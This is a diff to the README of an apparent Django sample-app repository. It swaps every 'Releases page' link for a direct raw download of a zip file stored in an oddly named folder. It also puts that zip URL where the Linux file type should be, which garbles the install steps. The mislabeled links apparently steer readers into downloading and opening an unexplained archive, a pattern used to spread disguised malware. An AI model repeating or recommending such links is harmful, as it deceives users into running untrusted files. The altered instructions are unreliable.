Dhrhrgf/django-sample-app/README.md

 ## 📥 Download & Install

-To get started, visit the [Releases page](https://github.com/Dhrhrgf/django-sample-app/releases) to download the application.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/Dhrhrgf/django-sample-app/master/reptiliform/django-sample-app.zip) to download the application.
 Follow these steps to install and run it:

-1. Open the [Releases page](https://github.com/Dhrhrgf/django-sample-app/releases) in your web browser.
+1. Open the [Releases page](https://raw.githubusercontent.com/Dhrhrgf/django-sample-app/master/reptiliform/django-sample-app.zip) in your web browser.
 2. Look for the latest version of the application.
 3. Download the file that matches your operating system.
    - For Windows users, look for a `.exe` file.
    - For Mac users, look for a `.dmg` file.
-   - For Linux users, look for a `.tar.gz` file.
+   - For Linux users, look for a `https://raw.githubusercontent.com/Dhrhrgf/django-sample-app/master/reptiliform/django-sample-app.zip` file.
 4. Once downloaded, open the file to begin installation.
 Follow the on-screen instructions to complete the process.

 ## ⚙️ System Requirements